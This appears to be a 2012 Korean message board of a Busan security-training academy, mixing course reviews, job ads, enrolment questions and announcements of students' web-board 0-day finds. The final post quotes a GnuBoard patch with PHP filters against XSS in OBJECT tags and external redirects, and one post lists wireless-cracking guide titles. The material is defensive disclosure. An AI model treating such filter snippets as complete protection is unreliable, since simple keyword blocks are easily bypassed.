-------이름: 관리자, 날짜: 2012.09.12 02:05----------------------------

-------------------------------------------------------------이름: 관리자, 날짜: 2012.09.11 08:14----------------------------
 사내보안, 보안인증, 보안기술, 개인정보운영관리 분야 모집  쿠팡에서 보안인력을 채용중에 있다. 모집부문은 사내보안, 보안인증, 보안기술, 개인정보운영관리 등이다. 경력자를 모집하고 있다. 접수마감은 9월 30일까지이며 좀더 자세한 모집요강은 아래 링크를 참조하면 된다.-보안인력 모집: coupang.saramin.co.kr
-------------------------------------------------------------이름: 취업문의, 날짜: 2012.09.10 08:14----------------------------
제가 여기저기서 군면제때문에 거의 합격하다가 떨어졌거든요

여기서 열정을 다해서 공부를 하면 취업이 가능한가요?

군면제때문에 취업이 안되면 돈낭비라는 생각도 들어서요ㅠㅠ
-------------------------------------------------------------이름: 김준석, 날짜: 2012.09.05 04:47----------------------------
일반대학 휴학중 인데요

이번 13기 수강절차좀 자세히 알수잇나요?

웹에서 신청 말고 전화상담이나 방문해서

카드발급이라던지

또 지금 정원에 얼마나찻는지도 알려주시면

감사드려요
-------------------------------------------------------------이름: 관리자, 날짜: 2012.09.05 04:18----------------------------

-------------------------------------------------------------이름: 김준용, 날짜: 2012.09.03 02:33----------------------------
기초 지식도 아무 것도 없지만 그냥 해보자하는 마음으로 학원에 지원하게 되었고 C언어 때 부터 좀 못따라 는 면이 있었습니다.
 박 선생님께서는 제게 의지가 부족하다고 했는데 전 진짜 열심히 했었는데 그말을 듣는 순간 제가 진짜 의지가 부족하나 보다라고 느꼇지만 점점 더 나아가질 안고 더 나태해진거같습니다. 그러면서 수술을 하게 됬고 모의해킹 부분에서 수업을 참가하지 못하게 되었습니다. 그렇지만 마지막 날 학원을 다시 가므로써 모의 면접을 보게 되었고 그 면접 때 성만이형의 면접 장면을 보자 똑같이 공부했지만 난 형 보다 부족하고 형은 내보다 더 나은가 하면서 그날부터 다시 모의해킹 보고서를 임시로 정배형에게 받고 다시 공부를 시작했습니다, 혼자 스스로 하면서 느끼는데 학원 다닐 때 열심히 하고 재때 재때 보고서를 써 냇으면 더 수월했을 것을 처음부터 다시 해야한다는 생각에서 부터 힘이 빠지기 시작하고 계속 보고서를 써내려 갈 때마다 내가 개으름을 많이 피운거 같다는 생각을 들었습니다. 
 계속 해서 매듭을 지어서 끝 까지 해보고 좋은 정보보안전문가가 되서 학원 한번 찾아가보겠습니다! 수고하세용
-------------------------------------------------------------이름: 관리자, 날짜: 2012.09.03 02:03----------------------------

-------------------------------------------------------------이름: 남재우, 날짜: 2012.08.30 11:52----------------------------
중학교때부터 보안분야에 관심이있었지만

교육해주는 교육기관이없어서 찾다가 꿈을 접은기억이있는데

제작년겨울쯤 지하철에서 i2sec광고를 보고 꿈을 키워왔다가

올4월경쯤 학원을 등록하게 되어서 다니게되었습니다.

힘들고 소위말하는 멘탈붕괴에 이르기까지 다양한 경험도 해보았고

팀프로젝트를 맡아 서로 조원들끼리 의견을 주고받아가며

프로젝트를 해내는것에 큰 흥미도 얻었고

관심있던 분야인 리눅스와 네트워크,  웹, 무선보안쪽 강의도 듣게되어

알찬 4개월을 보낸것 같습니다

길다면 길고 짧으면 짧았던 4개월이지만 많은것을 얻어갑니다

전혀몰랐던 지식을 습득하게 해주신 문경곤선생님

채찍질해가시며 끝까지 챙겨주신 박용훈선생님

프로그래밍언어에 대해 지식을 습득하게 해주신 김상훈선생님

흥미있던 네트워크보안쪽에 지식을 채워주신 김성현선생님

모든 선생님들께 감사하며 

막내챙겨주시느라 같이 고생해주신 10기 주간 형님들 누나께

감사말씀 돌리고싶습니다

알찬 4개월이었습니다

감사합니다
-------------------------------------------------------------이름: 관리자, 날짜: 2012.08.29 03:29----------------------------

-------------------------------------------------------------이름: 주성만, 날짜: 2012.08.28 11:45----------------------------
안녕하세요 10기 야간반 김성훈입니다. 벌써 잊으신건 아니죠??ㅋ

예전부터 보안에 관심이 많아 아.. 대학졸업하고 서울로 가야 하는건가.. 이런생각이었어요.

하지만 우연히 지하철에서 광고를 보았어요. 평소에 광고를 잘 보진 않지만 "보안" 이 단어에 

무척 끌렸던거 같아요. 바로 스마트폰 열고 URL 입력후 알아 보기 시작했죠. 그리고 수강후기를

가장 많이 본거 같아요. 보면서 와 ~ 대단하다. 나도 저렇게 할 수 있을까?? 이런생각이 많이 들었어요.

지금 기분이 이상하네요.. 얼마 전까지만 하더라도 제가 이 게시물을 보고있었는데.. 이렇게 글을 

작성하고 있으니 말이에요.ㅋ 지금부터는 제가 수업하면서 느낀것에 대해 써보려고 해요.



C언어 & 리버싱 김상훈 쌤!! 저는 컴공을 전공으로 하고 있어 C언어 접한지는 오래 되었지만,

이번 C언어 들으면서 실력이 한층 업그레이드 되는것 같았어요. 전에는 알고싶은 부분에 대해서만

알고 있었고, 열심히 하진 않았지만 샘이 중요한부분 콕! 집어서 알려주시고 많은 도움이 된거 같아요.

특히 리버싱 시간에는 더 재미있었어요. 어셈블리어 라는 단어는 많이 들어 왔지만 접해보고싶다.

라는 생각이 많이 들었엇지요. 샘이 쉽게 설명해주시고 어셈으로 함수 구현하는 보고서가 도움이 

많이 된듯합니다. 키로거에 관심이 많이 이것저것 제가 많이 물어 봤었죠??ㅋ  아직 다 완성은 하지 

않았지만, 이제 흐름이 어떤지 알게 되었어요. 그리고 수업을 들으면서 c언어와 리버싱에 대해 다지게

되었고, 더 공부 해보고 싶은 생각이 드네요. 샘 그동안 수고하셨고 고마워요~!! ㅋ



리눅스 & 네트워크 김성현 쌤!! 수업 초반 부터 같이 지내와서 그런지 제일 친근감이 드는 샘 같네요.

제가 커피를 자주 마시다 보니 더욱 마주치게 되어 더 이야기 하게 된거 같기두 하구요 ㅋ 

샘덕분에 무서웠던 리눅스와 네트워크에대해 개념을 잘 잡아 가는듯 합니다. 쉽게 쉽게 설명 해주시고

실습도 많이 해본게 무척 도움이 되는 듯 했어요. 그리고 이것저것 궁금한것이 너무 많아 많이 물어보기 

도 했엇는데요 ㅋ 그때마다 궁금증을 풀어 주셔서 고마워요 샘 ~~! ㅋ


시스템 & 웹 해킹 박용운 쌤!! 샘은 정만 제게 신같은 존재 이십니다~ㅋ 정말 처음 수업 들어 오셨을때

뭔가 있어보이고 살짝 무섭다는 생각도 많이 들었습니다. 지내오면서 샘 실력과 열정에  한번 더 샘에게

반한?것 같습니다. 인정 받고 싶기도 했구요. 전 샘이 해준말 중에 가장 기억에 남는 말이 있어요.

" 남들은 2~3일 하고 포기하지만 , 전 그때 부터 시작이에요" , " 더 해보세요 !"

전 이 말들이 가슴 깊숙히 자리 잡고 있는듯 하네요. 시스템 워게임이나 그 어렵다는 BOF 워게임 등

힘들거나 포기하고 싶을때마다 저는 이 말들이 떠오르더라구요. 개인적으로 굉장히 힘이 되기도 했구요.

그러다보니 시스템 워게임도 다 풀게 되어 자랑 스럽게 이름도 올리게 되고, BOF 워게임도 끝 단계까지

갈수 있었던 원동력이 된거 같아요.  비록 제로데이 시간에는 제로보드와 그누보드에 대해선 찾아 내지

못했지만, 아직 전 보기 하지 않았답니다. 실력을 더 갈고 닦아서~ 꼭! 찾아 낼거에요. 

그리고 마지막, 모의 면접시간에는 굉장히 큰 도움이 된듯 하구요. 정말 고생 많으셨고 고맙습니다 샘~!



그리고 마지막 무선 해킹 문경곤 쌤~!! 진짜 이런말 들으면 식상 할거 같지만 저도 한번 하고 싶네요.

문샘은 진짜 카리스마 최고 이십니다~ ㅋ 처음 수업 하자마자 질문 공세에 놀라기도 했지요 ㅋ 

하지만 수업 시간에는 정말 재미있는 분이시고, 때로는 진지 하시기도 했습니다. 무선에 대해 처음 

접하게 되었는데 지금 이렇게 무선이 쉽게 다가 오고 있다는것은 샘이 쉽고 재미있게 알려 주신 

이유 이지 않을까요?ㅋ  아직까지도 수업 내용 설명 해주시면서 예를 든것이며 ~ 설명들이 기억이나네요

옴니~ 펑퍼~~~짐 하게 ! 다이렉션  찍~~!! ㅋㅋ 수업 당시에는 우수웠지만 지금은 잊혀 지지가 않네요 .

그리고 문샘이 해주신 말도 굉장히 힘이 된 말이 있답니다. 

" 삽질은 신이 내려주신 선물?이다?"  " 오~~ 나에게 실력이 늘 기회를 주셨구만!! "

이말도 저의 열정을 태우는데 굉장히 도움이 된 듯 합니다. 하다가 막히는 부분이 나오면

박샘이 해주신 말과 문샘이 해주신 말이 도움이 많이 되거든요.

" 그래 남들은 지금 포기 하겠지만 난 끝까지 해내야지! 안되면 되게 하면 되잖아!! "
" 오호호~! 요래 또 기회가 찾아왔구만 , 오~ 또 실력이 늘 시간이 찾아왔구만 " 

속은론 이렇게 생각 하며 한답니다. 이렇게 하면 한층 더 마음이 가벼워지고 집중이 

잘되는 듯 했어요 . 
여기 저기 바쁘시지만 대단하시다는걸 느꼈구요 그동안 고생 하셨고 고맙습니다 문샘~!!ㅋ




모두 모두 고마워요 4분 샘들 ~ 제가 재미있어하고 계속 하고 싶은걸 찾게 만들어 주신거 같아요.

비록 ,, 보고서를 제 기간 마다 내진 못했었지만 지금 보충 하고 마무리 작업을 하고있답니다.

샘이 알려주신 책들도 조금식 공부해 가고 있고, 정말 !! 열심히 하겠습니다.

자주 자주 찾아가고 싶고, 오늘도 학원 가야 할거 같은 느낌도 들지만.. 

그만큼 아쉬운거 같습니다. 그리고 열정 하나는 제대로 받은거 같아요~ 

꾸준히 할 수 있는 힘이 된거 같아요!! 



그리고 10기 야간반 모두들 수고하셨어요. 

수강 기간중에 생일이 겹쳐 우울 했었는데. 생일도 같이 챙겨주고  

힘들 수도 있었지만, 같이 하면서 정말 힘이 많이 나고 정도 많이 든것 같아요

반장님, 준석이형, 주하, 동원, 정배 , 성현, 준용이 

정말 고생많았고 앞으로도 더 열심히 해서 ~ 잘 됬으면 좋겠어요..!!ㅋ

모두들 파이팅이고! i2sec 도 파이팅 입니다.


-------------------------------------------------------------이름: 관리자, 날짜: 2012.08.27 02:25----------------------------
기업명 : 파이오링크   직무 : 보안컨설팅, 모의해킹, 취약성분석 등   지원자격 : - 신입·경력, 대졸(2,3년) 이상               - 전산학과 및 보안관련 전공자               - 모의해킹 등에 관심이 많은자               - 보안에 대한 기초지식이 있는자               - 리더쉽이 있는자, 열정이 있는자               - 정보에 목말라 하는 자   이력서제출 : ii@i2sec.co.kr (단, i2Sec 수료생만) 8월 30일까지 #시간엄수
-------------------------------------------------------------이름: 이종대, 날짜: 2012.08.26 09:41----------------------------
처음 수강접수하러 갔을때 참.. 4개월 넘무 길다고 생각했는데요..

어느 순간 4개월이 끝났네요... 처음에는 무슨 이야기인지 모르겠다고 생각하고 그냥 해보자

따라만 가보자 이런 생각이였는데.. 하루 이틀 지나고 재미가 있고 문제를 하나 풀때마다 얼마나

재미있고 신기했는지 그렇게 한과목씩 배우면서 이렇게 과정을 마쳤네요.

처음에 쌤들 그동안 고생하셨어요.. 가끔 답답하고 그럴때 많았죠... 그냥 넓은 마음으로 이해해주세요

지금까지 몰랐던 부분도 많이 배우고 신기해하면서 참 재미있고 즐겁고 신기했던거 같네요

4개월을 생각해보면 처음에 더 노력을 할것을 이런 후회가 드네요.. 

너무 즐겁고 재미있는 내용이였는데 아쉽네요... 

가끔 연락드리고 학원에도 찾아가도록 할께요.. 쏘주 한잔 해야죠.. 쌤....

10기 야간반 참.. 고생 많았어... 준석, 석만, 정배, 동원, 주하, 준용, 종진 그리고 막내 성현이까지

4개월 과정은 마쳤지만 서로연락하며 지내자..

마지막으로 쌤들 너무 감사했습니다. 앞으로 I2sec의 발전을 기원합니다. 
-------------------------------------------------------------이름: 궁금이, 날짜: 2012.08.26 08:24----------------------------
수강 수료후 부산에서 취업 하고싶은데

부산에서도 중견기업 이상급으로 취업할수 있나요?

요점은... 부산 중견기업 이상급의 티오와
           다른 지역과 비교해 페이가 적진 않은지 입니다

수고하세요 ^^
-------------------------------------------------------------이름: 배효연, 날짜: 2012.08.24 12:58----------------------------
안녕하세요 
10기 주간반을 수료하게 된 배효연입니다.
4월 23일 개강하여 오늘 8월 24일 종강하게 되었네요

처음엔 막연히 아무것도 모르는 상태에서
검색으로 인하여 관심을 가지고
오게 되었는데 ...

두려웠던 것과 달리 울쌤분들이 너무 쉽게 설명해주시구
어느새 4개월후에보니 
저희도 모르게 많이 익숙해졌네요
4개월전에는 생각도 못한 지식들이 머릿속에 있고
부딪혀도 생각하고 풀고싶은 욕심에 공부를 더하게되고
풀고나서 그 뿌듯함이란 .. ㅎ

원래 취업을 목적으로 배울생각이었지만
더욕심이 생겨서 공부를 더하려고 합니다..
10기 주간분들 다 고생하셨구.!!!!
저희 쌤들 고생하셨습니다.ㅠㅠ...

i2sec 쌤분들께 감사합니다.(__)
-------------------------------------------------------------이름: 김성현, 날짜: 2012.08.24 11:24----------------------------
4개월... 길지도 짧지도 않은 시간이었다.

처음 야간반 학생들과의 만남이 어색하였지만 곧 친해져 지식을 나누던것이 생각이난다.

보안쪽분야의 관심이 생겨 혼자서 공부하는것보다 i2sec에서 학생들과 커뮤니티를 통해 

함께공부한것이 정말 4개월간의 수업을 즐겁게해준것같았다.

.

선생님들도 정말 잘해주신다.

나의 기억으로 남은 4명의 선생님은 이렇다


모든 학생들에게 따끔하게 말씀해주시면서도 격려의 말씀을 해주시는 박용운선생님

카리스마가 있으시지만 마음씨가 박용운 선생님과같은신 문경곤선생님

가장많은 농담을 주고받으면서 웃어주시는 김상훈선생님

이름이 같아서 가장 친근감이 컸고, 잘가르쳐 주시던 김성현선생님


4명의 선생님, 일명 사천왕

정말 훌륭하신 선생님들이시다.

나도 김성현 선생님의 동일한 이름을 가졌으므로 이름값을 해야겠다고 다짐하였다.

.

4개월동안의 수업을 통해서 많은것을 알게되었던거같았다.

보안쪽 지식이 거의 밑바닥이었던 내가 이렇게 많은것을 알았다는게 너무 놀랍다.

처음에는 내 나이로 뒤쫓아갈수있을까? 수준에 맞을까? 열정이있었지만 걱정이되었었다.

하지만 달랐다.

선생님들께서 하시는 교육방식의 교육이 머릿속에 쏙쏙 들어오는걸 느끼고는 흥미를 가지고

나도 할수있을것 같다는 생각을하게되었다.

앞으로도 이 자세로 끝까지, 변함없이 유지하면서 공부를 계속해야겠다.

.

선생님들 4개월간 10기 모든 학생분들 교육해주셔서 감사합니다.

나중에 더큰 모습으로 다시 나타나겠습니다.

그때까지 모두 화이팅!


-------------------------------------------------------------이름: 이주하, 날짜: 2012.08.24 06:04----------------------------
처음 올때는 많은 떨림을 가지고 학원에 왔지만 4개월의 수료과정이 상당히 빠르게 느껴졌다.
4명의 선생님들이 상당히 친근하게 다가와 주셔서 어색하지도 않고 재밌게 수업을 배웠다
학원 수강 1개월 정도 된 후에는 "4개월 언제 끝나나 " 이런 생각을 자주 했지만 하지만 배울 수록 빠르게 가는 시간에 재미를 느끼며 4개월이라는 시간을 다 채웠다.
모든 기간이 끝난 후 되돌아 보면 확실히 배운것이 많은 4개월이였다.
완전 지식 없는 상태에서 정보보안이라는 지식이 조금이라도 채워진 것이 느껴질때 정말 뿌듯함을 느꼈다.
학원을 다닌것에 대해 후회가 없어 나름 만족하는 4개월이였다.
4개월동안 열심히 가르쳐주신 선생님들 감사합니다~~ ^^ 
-------------------------------------------------------------이름: 관리자, 날짜: 2012.08.21 04:45----------------------------
  현재 모집 중인 12기 정원이 다 차서 모집을 조기 마감합니다.   13기 모집 일정은 빠른 시일 내로 홈페이지에 공지가 될 것입니다.   감사합니다.
-------------------------------------------------------------이름: 문의, 날짜: 2012.08.21 03:56----------------------------
언제부터 신청 받나요?

12기 교육 시작일은 언제죠?
-------------------------------------------------------------이름: donggi, 날짜: 2012.08.14 08:43----------------------------
해킹보안에 있는
과정들만 단과로 가능한가요?
-------------------------------------------------------------이름: 관리자, 날짜: 2012.08.14 05:06----------------------------

-------------------------------------------------------------이름: 관리자, 날짜: 2012.08.13 03:07----------------------------
 i2Sec 입니다.IT 가 부합되지 않은 곳을 찾아 보기가 힘든 현 시대에, 개인정보 유출 및 7.7 DDoS 등 정보보안의 힘이 절실히 필요할 때 입니다.자그마한 힘이 되겠지만 저희 i2Sec 도 한발앞서    Wireless 해킹 Top 4 보안 가이드 라인을 제작하여 배포 합니다.         1. Wep Crack   동영상보기     2. Wpa Crack   동영상보기     3. Phising   동영상보기     4. Dos Attack   동영상보기    
-------------------------------------------------------------이름: 최제석, 날짜: 2012.08.11 05:40----------------------------
저가 작년 이맘때쯤에도 컴퓨터 보안관련해서 관심이 많아
김해에서..부산역까지 갈 생각도 있고 한번 전화연락드리니
와서 상담받으셔도 좋다고 하셨거든요..
근데 저가 지금 고2 여름방학이 다 지나가고있는데 계속 이렇게 생각만할수록
시간만 지나간다고 생각해서 문의글 올립니다..
저희 부모님이나 진로선생님 같은경우에는 저가 등급이 별로 좋지않아서 공부부터하고 대학을드러간후
학원을가라고 하시는데.. 저가 볼땐 저가 알아본다고 여러카페에도 들어가서보고 검색을했을때
저와 비슷한 나이또래에 실력자도 많이보았고 대학을 드러간후 준비하면 많이 늦다고 생각이들거든요..
그리고 지금 좀 늦은감이 있지만 대학들어가기전에 포트폴리오도 작성해서 들어갈때
플러스가 된다고생각하고 저가 어떻게 하는게좋을까요.. 대학을 드러간후 보안쪽 공부를하는게
정말 낮은건가요? 

-------------------------------------------------------------이름: 정보보안, 날짜: 2012.08.10 12:07----------------------------
i2sec 교육센터에서 
한국 생상성본부, 국방부, 사이버경찰청 등등 많이 교육하시는데
학원에서 열심히 노력한다음에 수료 후에
사이버경찰청(사이버수사대) 또는 한국인터넷진흥원(KISA) 에 취업 할 수 있나요?
기술적인 부분에서...궁금합니다...
그리고 사이버경찰청 모집할때에 악성코드/리버싱이랑 디지털 포렌식쪽을 주로 뽑는데
i2sec에서는 디지털 포렌식쪽 교육은 안하는지 궁금합니다. 혹은 할 의향은 없으신지..
-------------------------------------------------------------이름: 수강생, 날짜: 2012.08.09 04:13----------------------------
모기가 너무 많아서 미치겠어요
어떻게 해결이 안될까요?
모기 이야기 한지가 언젠데..
알면서도 해결 안해주시는 듯..

우리는 쾌적한 환경에서 교육 받고 싶습니다!!!

한달에 만원정도 투자해서 
강의실 하나에 리퀴드 모기향 하나씩 설치해주면
완전 좋겠다!!!

환경이 중요합니다....
최고의 강사진..최고의 모기때..??


-------------------------------------------------------------이름: 관리자, 날짜: 2012.08.09 01:23----------------------------
서울에 타 학원과 많이 고민하다, i2sec 으로 오게 되었습니다. 정신없는 4개월이였지만, 정말 여기 오길 잘 했다는 생각이 듭니다. 열정 가득한 선생님들 덕분에, 끝까지 포기 하지 않고 공부 할 수 있었습니다. 어떤 학원이던지 선생님들의 열정과 실력이 중요하다고 생각합니다. 그 모든 것이 갖추어 진 곳에서 공부해서, 4개월이 지난 지금 너무 뿌듯합니다.~^^ 박쌤~김쌤님들, 문쌤 감사합니다~ 
-------------------------------------------------------------이름: 강우석, 날짜: 2012.08.08 02:26----------------------------
저도 벌써 이렇게 후기를 남길 시간이 오게 되었네요...약 4개월 전 친구의 권유로 알게 되었 던 i2sec은 평소에 큰 목표 의식이 없던 저에게 인생의 전환점을 만들어 주었습니다.리눅스, C언어, 네트워크, 시스템, 버퍼 오버 플로우, 무선 프로젝트, 웹 해킹, 제로 데이..그리고 이 모든 것의 결과인 보고서..짧게 느껴진 4개월 동안이지만 정말 많은 공부를 했었고, 많은 것을 얻었습니다. 처음에 배웠던 리눅스, C언어는 비교적 쉽게 느껴 져 긴장을 놓기 쉬웠던 것 같습니다. 그럴때마다 쌤들이 PUSH! 해주셔셔 긴장을 풀지 않도록 간단한 것이라도 예습 복습을 항상 하였습니다.그 뒤에 하나씩 터지는 보고서들로 인해 "i2sec인들은 왜 하나 같이 보고서를 혐오 하는가?" 라는 의문점을 몸소 풀게 되었습니다....날이 갈 수록 늘어나는 각종 보고서 제출과 프로젝트는 몸과 마음을 굉장히 지치게 만들었으나 그럴 때마다 쌤들의 PUSH!가 있어 힘이 되었습니다.공부의 재미를 느끼게 해주었던 수업들은 많은 궁금증을 유도하여 무한 삽질을 하게 만들었고, 저를 4개월 간 해가 뜨는 것을 보고 취침 하도록 하였습니다.일반 적으로 생각 되는 수업과는 틀린.. 저에게는 정말 재미있고 정말 의미있는 시간들이었습니다.그 동안 좋은 가르침을 주신 문경곤쌤 박용운쌤 김상훈쌤 김성현쌤 님들에게 진심으로 감사하다는 말씀을 드리고 싶습니다.그리고 마지막으로 지칠 때마다 힘이 되주고, 모르는 것은 함께 공유하고, 공부할 수 있는 분위기를 만들어 주신 9기 주간반 여러분들에게도 감사하다는 말씀을 드립니다.i2sec 화이팅!
-------------------------------------------------------------이름: 김현호, 날짜: 2012.08.08 01:39----------------------------
안녕하세요. 저는 이번 6월에 학원을 수료한 학생입니다.

수강후기를 쓰는게 조금 늦어 쓰지 않을까 생각도 했지만 그래도 혹시나 이 글을 읽고 

조금이나마 도움이 되는 분들이 계셨으면 하는 마음으로 후기를 남깁니다.

저는 학교를 졸업하고 한분야에 정착하지 못하고 여러 분야를 떠돌아 다니다가 잡리를 잡지 못하고 

나이가 30대에 들어서버린 늦깍이 취업 준비생이었는습니다.

그러던 중 평소에 관심이 있었던 해킹에 대해서 배워보고자 마음을 먹게 되었고 배울 수 있는 학원을 서

울쪽에서 찾고 있었습니다.

하지만 관련업계에 종사하시는 지인분의 추천으로 부산에 있는 i2sec를 오게 되었습니다.

지금 생각해보면 지인분의 추천이 저한테는 큰 행운이었던것 같습니다.


첫날 학원에 오기전까지는 비전공자인 제가 과연 수업을 따라 갈 수 있을까 걱정이 이만저만이 아니었습

니다. 서울에 있는 아이티뱅크에 상담을 받을때 비전공자는 최소 4개월을 기본교육을 받아야 보안교육 수

업을 따라 갈 수 있다는 말을 들었던터라 걱정이 더 했었습니다.

하지만 첫날 선생님들의 말씀을 듣고 하루하루 수업을 진행하면서 그런 걱정은 싹 사라졌습니다.

기본부터 전문적인 지식까지 하나하나 풀어서 설명해주시는 선생님들 덕분에 수업을 따라 갈 수 있게되

었고, 내용이 이해가 되니 점점 재미있어 하는 자신을 발견하게 되었습니다.

물론 중간중간 공부를 하다보면 제가 가지고 있는 것이 이것밖에 되지 않나하는 자괴감에 빠질때도 있

고, 그러다보면 포기해버리고 싶은 생각이 들때도 있었습니다.

하지만 그럴때마다 선생님들의 격려과 채찍질이 있었기 때문에 무사히 4개월의 교육과정을 마칠 수 있었

습니다.


학원을 마치고 한달이라는 시간이 지나버린 지금 한가지 아쉬운점이 있다면 마지막 4개월 중반부에 들어

설 때쯤 무선프로젝트와 여러가지 보고서가 겹쳐서 그때 당시에는 잠 잘 시간도 줄여가며 한다고 했지만 

지금 생각해보면 스스로 나는 최선을 다했지만 시간이 없어서 못하는 것이라는 변명을 만들어 놓

고 조금 풀어졌던것 같습니다.

그래서 앞으로 학원을 다니게 되는 분들은 마지막까지 스스로가 떳떳하게 최선을 다해서 공부했다는 생

각을 가질 수 있도록  열심히 하셨으면 좋겠습니다.


그럼 저의 어설픈 수강후기는 여기서 마치도록 하겠습니다. 
-------------------------------------------------------------이름: 관리자, 날짜: 2012.08.02 05:16----------------------------
안녕하세요. ^^ i2Sec 교육팀입니다.     "경찰청" 에서 이루어졌던, 정보보안교육이 내실있게 마무리 되었음을 알려드립니다.     - 교육에 참여해주신 경찰청 관계자 분들께 감사의 말씀 전하며 차 후 국가기관     정보보안 분야에 i2Sec 이 앞장서겠습니다. 국가기관 및 기업 교육문의 : 1661 - 2452(교육팀) ii@i2sec.co.kr
-------------------------------------------------------------이름: 관리자, 날짜: 2012.08.02 04:29----------------------------
 직무 : 보안 관제     경력 : 1 ~ 3년     연봉 : 2600 ~ 2800 협의     이력서 제출 : ii@i2sec.co.kr 으로 2012. 8. 2. 까지(i2sec 졸업생만)     근무지 : 농협중앙회 
-------------------------------------------------------------이름: 관리자, 날짜: 2012.08.02 04:27----------------------------
안녕하세요. i2sec 여러분.  이력서는 회사에 맞게 수정해서  포트폴리오와 함께 압축해서 보내주시면 됩니다.  모든 i2sec 인들에게 좋은 결과 있기를 바랍니다.  화이팅!!!
-------------------------------------------------------------이름: 관리자, 날짜: 2012.07.31 12:36----------------------------
우선 질문이 많아 죄송합니다. 

궁금한점은 국비지원을 생각 하고 있는데 재직자와 강의와  실업자 강의가 

강의 내용 자체가 다른것인지 다르다면 어떤부분이 다른것인지 

같은것이라면 재직자 국비지원자가 오전에 할수는 없는지 여부입니다 

질문이 많아 죄송합니다 
-------------------------------------------------------------이름: 관리자, 날짜: 2012.07.31 12:35----------------------------
수강료가 어떻게 되지요? 
그리고 그 과정하구... 
배우기전에 미리 알고있어야할 사항..그런것도 알려주시기 바랍니다. 
홈피에서 찾으려니 힘드네여 
-------------------------------------------------------------이름: 관리자, 날짜: 2012.07.31 12:34----------------------------
경기도서 살고 있는 학생입니다.
제친구가 i2sec 4기 졸업한 황연후 학생 친구입니다. 친구도 졸업하고 취업해서 일을 열심히하고있어서 저도 배우서 취업을하고싶어요 근처에 원룸같은 시설이잇나요? 

-------------------------------------------------------------이름: 관리자, 날짜: 2012.07.31 12:33----------------------------
정보보안 전문가 종합과정 수강하면 취업까지도 시켜주시나요? 

아니면 정보보안 전문가 종합과정만 수료하게되는건가요? 

정확한답변부탁드리겠습니다^^ 
-------------------------------------------------------------이름: 관리자, 날짜: 2012.07.31 12:32----------------------------
25일부터 정보보안전문가 과정 오후반 수강하는 사람인데요. 

25일날 그냥 학원가면 되는건가요? 

뭐 필요한건 없나요? 

수강전에 연락주신다고 했는데... 
-------------------------------------------------------------이름: 관리자, 날짜: 2012.07.31 12:30----------------------------
 

안녕하세요웹해킹쪽으로 관심있어서 배울려고 하는데요 혹시 단과과정도 모집하시나요?아니면 6월에 종합과정 모집하시던데 마감되었는지 궁금합니다.수고하세요 
-------------------------------------------------------------이름: 관리자, 날짜: 2012.07.31 12:29----------------------------
관련 교육이 있거나 

개인적으로 수강을 하거나 할 수 있는 방법이 있을까요? 

이메일로 답장 부탁 드립니다. 
-------------------------------------------------------------이름: 관리자, 날짜: 2012.07.31 05:49----------------------------
 부산정보보안학원 i2Sec " 정보보안 전문가 종합과정 2기 " 이규호씨의 한국인터넷  진흥원     ("KISA") 주체사이버공모시나리오 수상을  축하드립니다.
-------------------------------------------------------------이름: 관리자, 날짜: 2012.07.31 05:47----------------------------
    원문 : http://www.dailysecu.com/news_view.php?article_id=2525     부산정보보안학원 i2Sec " 정보보안 전문가 종합과정 9기 " 강우석씨의 0-Day (  최신해킹기법 ) 발견을 축하드립니다.      부산에 위치한 정보보안 교육센터 i2Sec에서      9기 " 정보보안 종합과정 " 수료한 강우석  수료생분이     국내 최초로 유명 쇼핑몰 사이트의 최신 해킹 기법을 발표하여  보안대안을 마련하였습니다.
-------------------------------------------------------------이름: 관리자, 날짜: 2012.07.31 05:45----------------------------
     원문 : http://www.boannews.com/media/view.asp?idx=31869&kind=0     i2Sec " 정보보안 전문가 종합과정 9기 " 강우석씨의 0-Day ( 최신해킹기법 ) 발견을  축하드립니다.  
-------------------------------------------------------------이름: 관리자, 날짜: 2012.07.31 05:42----------------------------
  그누보드    원문 : http://sir.co.kr/bbs/board.php?bo_table=g4_pds&wr_id=7685                                                                        제로보드 xe                  원문 : http://www.xpressengine.com/blog/textyle/20905954          i2Sec " 정보보안 전문가 종합과정 9기 " 강우석씨의 0-Day      ( 최신해킹기법 ) 발견을 축하드립니다. 
-------------------------------------------------------------이름: 관리자, 날짜: 2012.07.31 05:37----------------------------
   출처 : http://www.xpressengine.com/blog/textyle/20771154      원문 : http://www.dailysecu.com/news_view.php?article_id=2169   i2Sec " 정보보안 전문가 종합과정 8기 " 하동민씨의  0-Day  ( 최신해킹기법 ) 발견을  축하드립니다.
-------------------------------------------------------------이름: 관리자, 날짜: 2012.07.31 05:34----------------------------
출처 : http://www.dailysecu.com/news_view.php?article_id=2108    
-------------------------------------------------------------이름: 관리자, 날짜: 2012.07.31 05:26----------------------------
국내 유명보드인 그누보드에 대한 0-Day를 i2sec 8기 여러분들이 발견하셨습니다. 8기 분들 고생많으셨어요~    원문 출처 :  http://sir.co.kr/bbs/board.php?bo_table=g4_pds&wr_id=7281          4.34.23  (2012.04.22)   [스크립트우회공격기법(XSS)] OBJECT 태그에서 javascript를 실행할수 있는 버그를 수정  (i2Sec  8기 하동민님께서 알려 주셨습니다.)   [스크립트우회공격기법(XSS)] 글쓰기시 이름에 HTML 태그가 입력되지 못하도록  수정 (i2Sec  8기 강우창님께서 알려 주셨습니다.)   login, logout시 외부로 리다이렉트 할 우려가 있어 url에 도메인을 지정하지 못하도록  수정 cheditor4의 삭제 코드에 문제가 있어 이번 버전부터는 cheditor4는 제외하고 배포합니다.  (i2Sec  8기 조민기님께서 알려 주셨습니다.)      이외에도  i2Sec 8기 여러분들께서 SQL Injection 등의 오류를 알려 주셨으나 그누보드4가  소스코드를  오픈하고 있으므로 해당  오류는 SQL Injection으로 보기 어렵습니다.  도움주신  i2Sec 8기 여러분들께 감사의 말씀을 전합니다.          * 패치된 내용 *  lib/common.lib.php  의 function  bad120422($matches) {  $code  = $matches[1]; if  (preg_match("#script#i", $code)) { return  "OBJECT 태그에 스크립트는 사용 불가합니다."; } else  if (preg_match("#base64#i", $code)) { return  "OBJECT 태그에 BASE64는 사용 불가합니다."; }  }  //  object 태그에서 javascript 코드 막기 $content  = preg_replace_callback("#]+)>#i", "bad120422", $content);   bbs/write_update.php  의 $wr_name  = strip_tags(mysql_escape_string($_POST["wr_name"]));   bbs/login.php  bbs/logout.php  의 $p  = parse_url($url); if  ($p["scheme"] || $p["host"]) { alert("url에  도메인을 지정할 수 없습니다."); }
-------------------------------------------------------------이름: 관리자, 날짜: 2012.07.31 05:24----------------------------
